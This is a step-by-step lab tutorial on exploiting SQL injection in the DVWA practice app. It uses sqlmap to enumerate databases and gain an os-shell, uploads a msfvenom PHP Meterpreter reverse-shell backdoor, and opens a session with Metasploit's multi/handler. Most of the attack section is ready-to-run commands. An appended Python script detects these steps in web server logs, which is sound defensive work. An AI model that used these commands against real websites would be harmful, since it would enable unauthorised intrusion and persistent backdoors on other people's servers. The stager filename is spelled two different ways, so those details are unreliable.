This article is exactly the same as the previous article; today I will use sqlmap to upload a backdoor file to DVWA, which suffers from an SQL injection vulnerability.
Requirements:
Xampp/Wamp Server
DVWA Lab
Kali Linux: Burp suite, sqlmap tool
First, you need to install the DVWA lab on your XAMPP or WAMP server; read the full article from here.
Now open DVWA on your PC and log in with the following credentials:
Username – admin
Password – password
Click on DVWA Security and set the Website Security Level to low.
From the list of vulnerabilities select SQL Injection for your attack. Type user ID: 1 in the text box. Don't click the Submit button without setting the browser proxy. Set your browser proxy to make Burp Suite work properly.
Turn on Burp Suite, click Proxy in the menu bar and turn on the "Intercept is on" button. Come back and click the Submit button in DVWA. The Intercept button is used to display HTTP and WebSockets messages that pass between your browser and web servers. Burp Suite will provide the "cookie" and "referrer" values under the fetched data, which will later be used in the sqlmap commands.
In the following command, sqlmap will analyze the URL to make a connection to the target and then use SQL queries with the given cookie to fetch the names of all databases.
sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovma5q47; security_level=0" --dbs
As the image below shows, sqlmap has dumped the names of all databases. Choose dvwa to upload the PHP backdoor.
Now type the following command to run sqlmap to access an os-shell on the web server (dvwa):
sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovmane47; security_level=0" -D dvwa --os-shell
It will try to generate a backdoor; I want to create a PHP backdoor on the target PC, therefore type 4 for the PHP payload and then type 4 for brute force search to find a writable directory to upload to.
It tries to upload the file to "/xampp/htdocs/" using different SQL injection techniques. As soon as the file is uploaded, it prints an INFO message that the file stager has been successfully uploaded to "/xampp/htdocs/" and you will get an os-shell on the victim PC. It also shows the path where you can manually upload your backdoor; look at the highlighted URL:
http://192.168.0.102/tmpunias.php
Open the URL http://192.168.0.102/tmpunais.php in a browser. From the screenshot you can read the heading of the web page, "sqlmap file uploader", which lets you browse for your backdoor and will then upload it to the following directory ("/xampp/htdocs/") of the web server (dvwa).
Let's prepare the malicious file that you will upload with msfvenom:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw
Copy the code from
Now load the Metasploit framework by typing msfconsole and start multi/handler.
Click on Browse to select your shell.php file and then click on Upload.
GREAT!!! Here it shows Admin File is uploaded, which means the backdoor shell.php is uploaded.
To execute the backdoor on the target PC, open the URL 192.168.0.102/shell.php in a browser and you will receive a reverse connection on multi/handler.
msf> use multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.0.104
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
meterpreter > sysinfo
Divine!!! A meterpreter session is opened.
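
Every step above leaves a trace in the web server's access log. The following Python example is added here and is not part of the original article: it scans Apache combined-format log lines for sqlmap's default User-Agent, SQL file-write keywords in the query string, and requests for a stager named like the tmpunias.php shown earlier, then lists clients that hit more than one rule. The log lines are constructed, and the `tmp[ub]xxxx.php` naming pattern is an assumption generalised from the filename on this page.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" log format: ip, request line, status, referer, user agent.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

# (rule name, field to inspect, pattern)
RULES = [
    ("sqlmap-user-agent", "ua", re.compile(r"sqlmap", re.I)),
    ("sqli-file-write", "uri", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    # Assumption: stager names follow the tmpunias.php shape seen in the article.
    ("sqlmap-stager-file", "uri", re.compile(r"/tmp[ub][a-z]{4}\.php(?:\?|$)")),
]

def scan(lines):
    """Return (line_number, client_ip, rule_name) for every rule hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line, skip it
        # Decode %xx and '+' so encoded keywords are still matched.
        fields = {"ua": m["ua"], "uri": unquote_plus(m["uri"])}
        for name, field, rx in RULES:
            if rx.search(fields[field]):
                hits.append((n, m["ip"], name))
    return hits

def multi_stage_clients(hits, threshold=2):
    """Clients that triggered at least `threshold` distinct rules."""
    seen = {}
    for _, ip, rule in hits:
        seen.setdefault(ip, set()).add(rule)
    return {ip: sorted(r) for ip, r in seen.items() if len(r) >= threshold}

# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '192.168.0.104 - - [10/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4521 "-" "sqlmap/1.7 (https://sqlmap.org)"',
    '192.168.0.104 - - [10/Jan/2024:10:02:10 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20INTO%20OUTFILE%20%27%2FPLACEHOLDER%27--%20-&Submit=Submit HTTP/1.1" 200 4400 "-" "Mozilla/5.0"',
    '192.168.0.104 - - [10/Jan/2024:10:02:12 +0000] "GET /tmpunias.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '192.168.0.50 - - [10/Jan/2024:10:03:00 +0000] "GET /dvwa/index.php HTTP/1.1" 200 6000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, rules in multi_stage_clients(scan(SAMPLE)).items():
        print(ip, rules)
```

The User-Agent rule only catches default sqlmap settings, so the file-write and stager-file rules are the ones to alert on; pair them with a file-integrity check on the web root for unexpected .php files.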